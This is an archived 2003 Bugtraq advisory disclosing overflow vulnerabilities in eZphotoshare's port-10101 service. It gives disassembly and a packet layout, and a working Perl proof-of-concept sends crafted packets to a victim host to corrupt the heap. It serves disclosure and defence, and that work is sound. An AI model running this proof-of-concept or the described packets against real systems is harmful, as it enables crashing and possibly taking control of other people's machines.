lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 03 Dec 2003 15:41:57 +0000
From: "Peter Winter-Smith" <peter4020@...mail.com>
To: bugs@...uritytracker.com, bugtraq@...urityfocus.com, vuln@...unia.com, vulndb@...urityfocus.com, vulnwatch@...nwatch.org
Cc: vuln@...urity.nnov.ru
Subject: eZphotoshare Multiple Overflow Vulnerabilities


eZphotoshare Multiple Overflow Vulnerabilities

##############################################

Credit:
Author     : Peter Winter-Smith

Software:
Package    : eZphotoshare
Versions   : All up to and including the latest verson
Vendor     : eZnetwork
Vendor Url : http://www.ezphotoshare.com/

Vulnerability:
Bug Type   : Multiple *Interesting* Overflows
Severity   : Moderately/Highly Critical
              + Code Execution with Application Privileges
              + Arbitrary Memory can be Overwritten

1. Description of Software

"eZphotoshare is an amazing new way to share Digital Photos over the 
Internet
with friends and family. Seeing is believing, download it today and
interactively share digital photos anytime, anywhere. It's FREE for home 
use."
- Vendor's Description

2. Bug Information

(a). Heap Corruption Vulnerability

By sending a packet of data of length 80 bytes to eZphotoshare on port 10101
exactly eight times in a row, it is possible to overwrite the ecx and eax
registers in memory when they are loaded from the esi pointer.

The vulnerable code, which lies in the RtlAllocateHeap function in the 
module
'ntdll.dll', is shown below:


:77F580C9            mov eax, dword ptr [esi+08] ; eax contains our 
arbitrary
                                                 ; dword of data

:77F580CC            mov dword ptr [ebp+FFFFFF64], eax

:77F580D2            mov ecx, dword ptr [esi+0C] ; ecx contains the next
                                                 ; arbitrary dword of data 
which
                                                 ; we supply

:77F580D5            mov dword ptr [ebp+FFFFFF60], ecx

:77F580DB            mov dword ptr [ecx], eax    ; write the contents of the 
eax
                                                 ; register to the address
                                                 ; referenced by the ecx
                                                 ; register!


The packet structure should be as follows:

$packet = "GET /aaa" . $eax . $ecx . "a"x64;

Where $eax and $ecx are four bytes exactly in length.

This type of flaw could, amongst other things, allow a remote attacker to
overwrite a saved return address on the target system and thus open the
possibility of remote code execution with the privileges of the user running 
the
application.


(b). Overwriting of Important Saved Values

By sending an overly long packet of data to eZphotoshare on port 10101 it is
possible to overwrite some important saved values in the system memory which 
can
be crafted to lead to complete control over the instruction pointer.

The vulnerable code lies in 'mfc42.dll' and is shown below:


:73DD1C3D            mov edi, dword ptr [ebp+08] ; [ebp+08] points to a 
pointer
                                                 ; to our user supplied data

...

:73DD1C62            push [ebp+18]
:73DD1C65            mov eax, dword ptr [edi] ; the value pointed at by the 
edi

    ; register comes directly from our user supplied data, therefore the eax
    ; register now contains anything we wish it to (even nulls!)

...

:73DD1C6D FF90A0000000            call dword ptr [eax+000000A0] ; whammo! 
the

    ; execution flow is directed to the address contained at, eax plus a0h. 
To
    ; gain control of the instruction pointer we just need to point to an
    ; address containing the instruction pointer which we would like to use
    ; (remembering to subtract a0h from the pointer address), and we have 
full
    ; control of the eip register!


Exploitation Notes:

  I have been able to execute code through the flaws found in eZphotoshare,
  despite the apparent complications which arise when it comes to 
exploitation,
  and therefore I would urge you to take measures to protect your systems if 
you
  use this software, whatever those measures may be.

3. Proof of Concept Code

I have decided not to release my remote code execution exploits for the
mentioned flaws until the vendor has had a fair amount of time to patch 
their
software. Instead I am going to release a proof of concept code which will
demonstrate the heap corruption vulnerability.

I am not going to release code for the Important Value Overwrite 
vulnerability,
since it is pretty straightforward to reproduce and is best just 
demonstrated
with netcat or the like.

For best results, attach the windbg utility to eZphotoshare before using 
this
proof of concept code, so that you can see the attack and its results in
realtime.

# 
---------------------------------[eZpsheap.pl]--------------------------------
#
#!/usr/bin/perl -w
#
# Heap Corruption Vulnerability in eZphotoshare PoC
#  - by Peter Winter-Smith [peter4020@...mail.com]

use IO::Socket;

if(!($ARGV[0]))
{
print "Usage: eZpsheap.pl <victim>\n\n";
exit;
}

print "Heap Corruption PoC\n";

for($n=1;$n<9;$n++){

$victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>"10101")
                            or die "Unable to connect to $ARGV[0] on port
10101";

$eax = "ABCD";
$ecx = "XXXX";

$packet = "GET /aaa" . $eax . $ecx . "a"x64;

print $victim $packet;

print " + Sending packet number $n of 8 ...\n";

sleep(1);

close($victim); }

print "Done.\n";
exit;

# 
------------------------------------------------------------------------------


4. Patches - Workarounds

No known patches have been issued. Secunia often have pretty sufficient
workarounds, so I would recommend that you check their 'solutions' on
www.secunia.com if you want a professional opinion.

5. Credits

    The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not 
regard
any of the analysis to be 'set in stone', and that if investigating this 
flaw
you back trace the steps detailed earlier for yourself.

Greets and thanks to:
    David and Mark Litchfield, JJ Gray (Nexus), Todd and all the packetstorm
crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)), pv8man, nick 
k.,
Joel J. and Martine.

Huge thanks to everyone who makes this industry as great as it is, and puts 
up
with all my ever so vague and technically questionable contributions ;o)

Brett Moore - Are you *trying* to break Microsoft? ;o) ;o(

o This document should be mirrored at:
    - http://www.elitehaven.net/ezphotoshare.txt

_________________________________________________________________
Hotmail messages direct to your mobile phone http://www.msn.co.uk/msnmobile

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ